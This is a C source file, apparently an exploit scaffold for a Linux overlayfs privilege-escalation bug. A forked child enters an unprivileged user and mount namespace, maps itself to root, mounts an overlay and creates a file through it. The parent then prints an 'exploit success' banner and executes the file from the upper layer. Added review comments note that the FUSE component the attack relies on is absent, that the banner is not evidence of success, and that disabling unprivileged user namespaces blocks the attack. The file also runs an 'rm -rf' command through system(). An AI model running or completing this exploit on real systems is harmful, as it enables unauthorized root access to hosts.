#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <errno.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <sys/mount.h>
#include <sys/capability.h>
// #include <attr/xattr.h>
// #include <sys/xattr.h>
// Hand-written prototype standing in for the two commented-out xattr headers
// above. Nothing in this file calls setxattr().
int setxattr(const char *path, const char *name, const void *value, size_t size, int flags);
// Scratch directory tree, relative to the current working directory.
// WORK, LOWER and UPPER are passed as the workdir=, lowerdir= and upperdir=
// options of the overlay mount in exploit(); MERGE is the mount point.
#define DIR_BASE "./ovlcap"
#define DIR_WORK DIR_BASE "/work"
#define DIR_LOWER DIR_BASE "/lower"
#define DIR_UPPER DIR_BASE "/upper"
#define DIR_MERGE DIR_BASE "/merge"
// Paths named "magic" under the merged view and the upper layer.
// Neither macro is referenced anywhere else in this file.
#define BIN_MERGE DIR_MERGE "/magic"
#define BIN_UPPER DIR_UPPER "/magic"
// Create `path` with permission bits `mode`.
// A path that already exists (EEXIST) is accepted silently; any other
// mkdir() failure ends the process through err(3) with exit status 1.
static void xmkdir(const char *path, mode_t mode)
{
    int rc = mkdir(path, mode);

    // Either the call succeeded or the entry is already there.
    if (rc != -1 || errno == EEXIST)
        return;

    err(1, "mkdir %s", path);
}
// Write the NUL-terminated string `data` to the existing file `path`.
// The file is opened write-only (no O_CREAT, no O_TRUNC) and the string is
// sent with a single write(). A failed open or a short write ends the
// process through err(3) with exit status 1.
static void xwritefile(const char *path, const char *data)
{
    const int fd = open(path, O_WRONLY);
    if (fd == -1)
        err(1, "open %s", path);

    const ssize_t want = (ssize_t)strlen(data);
    const ssize_t wrote = write(fd, data, want);
    if (wrote != want)
        err(1, "write %s", path);

    close(fd);
}
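// Print the contents of `path` to stdout with puts(), then a "len N" line.
// At most sizeof(data) - 1 bytes are read; anything beyond that is ignored.
// A failed open ends the process through err(3); a failed read is treated
// the same as end-of-file.
static void xreadfile(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd == -1)
        err(1, "open %s", path);

    char data[0x100];
    size_t len = 0;

    // The loop is bounded so one byte always remains for the terminator.
    // The earlier version read byte by byte with no upper limit and wrote
    // past the end of data[] for any file of 0x100 bytes or more.
    while (len < sizeof data - 1) {
        ssize_t got = read(fd, data + len, sizeof data - 1 - len);
        if (got <= 0)
            break;
        len += (size_t)got;
    }
    data[len] = '\0';

    puts(data);
    printf("len %d\n", (int)len);
    close(fd);
}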
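// Print the calling process's capability set in libcap's text form.
// Not called from anywhere else in this file.
void listCaps(void)
{
    cap_t caps = cap_get_proc();
    if (caps == NULL) {
        // Without a capability set there is nothing to render.
        warn("cap_get_proc");
        return;
    }

    ssize_t text_len = 0;
    char *text = cap_to_text(caps, &text_len);

    // Message text is kept exactly as the file had it.
    printf("The process %d was give capabilities %s\n", (int)getpid(),
           text != NULL ? text : "(null)");
    fflush(0);

    // cap_to_text() returns storage that must be released with cap_free();
    // the earlier version leaked it.
    if (text != NULL)
        cap_free(text);
    cap_free(caps);
}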
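// Child-side setup routine. In order, it:
//   1. runs an `rm -rf` command against DIR_UPPER through system(),
//   2. creates the ovlcap directory tree,
//   3. enters a new user namespace and mount namespace and maps the caller's
//      uid and gid to 0 inside it,
//   4. mounts an overlay filesystem on DIR_MERGE,
//   5. lists DIR_MERGE and creates DIR_MERGE "/file" through the merged view.
// Always returns 0. A failure of unshare(), of the /proc writes, or of
// mount() ends the process through err(3); a failed open() is only reported.
//
// NOTE(review): the page does not say which kernel issue this targets, and
// the "fuse" remark in the original comments refers to a component that is
// not part of this file.
//
// Detection and mitigation: the observable sequence is an unprivileged
// process calling unshare(CLONE_NEWUSER | CLONE_NEWNS), writing its own
// uid_map/gid_map, then mounting an overlay. Hosts that do not need
// unprivileged user namespaces can limit or disable them by sysctl
// (user.max_user_namespaces where available), which makes the unshare()
// call below fail.
static int exploit(void)
{
    char buf[4096];

    // NOTE(review): the glob sits inside single quotes, so the shell hands
    // it to rm literally rather than expanding it.
    snprintf(buf, sizeof buf, "rm -rf '%s/*'", DIR_UPPER);
    system(buf);

    xmkdir(DIR_BASE, 0777);
    xmkdir(DIR_WORK, 0777);
    xmkdir(DIR_LOWER, 0777);
    xmkdir(DIR_UPPER, 0777);
    xmkdir(DIR_MERGE, 0777);

    // The ids are captured before unshare(); they are the outer-namespace
    // values written into the maps below.
    uid_t uid = getuid();
    gid_t gid = getgid();
    printf("uid:%d gid:%d\n", (int)uid, (int)gid);

    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)
        err(1, "unshare");

    // The kernel requires "deny" in setgroups before an unprivileged
    // process may write its own gid_map.
    xwritefile("/proc/self/setgroups", "deny");
    snprintf(buf, sizeof buf, "0 %d 1", (int)uid);
    xwritefile("/proc/self/uid_map", buf);
    snprintf(buf, sizeof buf, "0 %d 1", (int)gid);
    xwritefile("/proc/self/gid_map", buf);

    snprintf(buf, sizeof buf, "lowerdir=%s,upperdir=%s,workdir=%s",
             DIR_LOWER, DIR_UPPER, DIR_WORK);
    if (mount("overlay", DIR_MERGE, "overlay", 0, buf) == -1)
        err(1, "mount %s", DIR_MERGE);
    puts("[+] mount success");

    snprintf(buf, sizeof buf, "ls -la %s", DIR_MERGE);
    system(buf);

    // Create (or open) DIR_MERGE "/file" through the merged view.
    snprintf(buf, sizeof buf, "%s/file", DIR_MERGE);
    int fd = open(buf, O_WRONLY | O_CREAT, 0666);
    if (fd < 0)
        perror("open");
    else
        close(fd); // the earlier version also called close() on a failed descriptor

    // The original ended with a commented-out kill(pid, SIGINT) labelled
    // "close fuse"; no such process is started in this file.
    return 0;
}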
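// Entry point: run exploit() in a forked child, wait for it, then pass the
// path DIR_UPPER "/file" to system(). Command-line arguments are unused.
// Returns 0 after the system() call; a failed fork() or waitpid() ends the
// process through err(3).
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    // The earlier version did not check fork() and went on to wait() and
    // print the banner even when no child had been created.
    pid_t pid = fork();
    if (pid == -1)
        err(1, "fork");
    if (pid == 0) {
        exploit();
        exit(0);
    }

    int status = 0;
    if (waitpid(pid, &status, 0) == -1)
        err(1, "waitpid");

    // NOTE(review): this banner is printed without looking at the child's
    // exit status or at the result of system() below, so it is not evidence
    // that anything succeeded.
    puts("[+] exploit success!");

    // NOTE(review): what DIR_UPPER "/file" contains at this point depends on
    // a component that is not part of this file.
    char buf[0x100];
    snprintf(buf, sizeof buf, "%s/file", DIR_UPPER);
    system(buf);
    return 0;
}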